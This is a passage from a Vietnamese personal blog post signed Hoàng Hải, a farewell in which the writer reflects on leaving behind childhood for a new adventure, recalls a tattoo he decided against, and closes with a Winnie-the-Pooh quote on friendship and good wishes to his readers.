Dừng lại nghĩa là chia tay những tháng ngày đẹp đẽ, bỏ lại mọi thứ, đó là tuổi thơ, đó là thời niên thiếu, đó là [tất cả]… để tiếp tục bước chân vào một cuộc phiêu lưu mới.

Anh đã định đi xăm, xăm chữ gì đó gợi cho anh nhớ về đất nước anh. Nhưng rốt cuộc anh lại bỏ ý định này. Có thể do anh hèn lắm, nên sợ đau *hai chấm pê*, cũng có thể anh nghĩ, có những thứ để đâu đó trong tim sẽ tốt hơn (dù thỉnh thoảng anh vẫn quên vị trí tim nằm đâu, nhưng cũng không hề gì đâu, anh hứa).

Thôi, viết dài, viết lắm rồi cũng phải viết tới dòng kết. Vậy thì kết sớm hay kết muộn cũng thế, nhỉ?

Các bạn đọc được những dòng này của anh, điều này có nghĩa các bạn đều là bạn anh. Anh xin dùng câu này vậy

‘We’ll be Friends Forever, won’t we, Pooh?’ asked Piglet.
‘Even longer,’ Pooh answered.

Anh gởi lời chúc may mắn tới tất cả các bạn 🙂

Hoàng Hải.
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.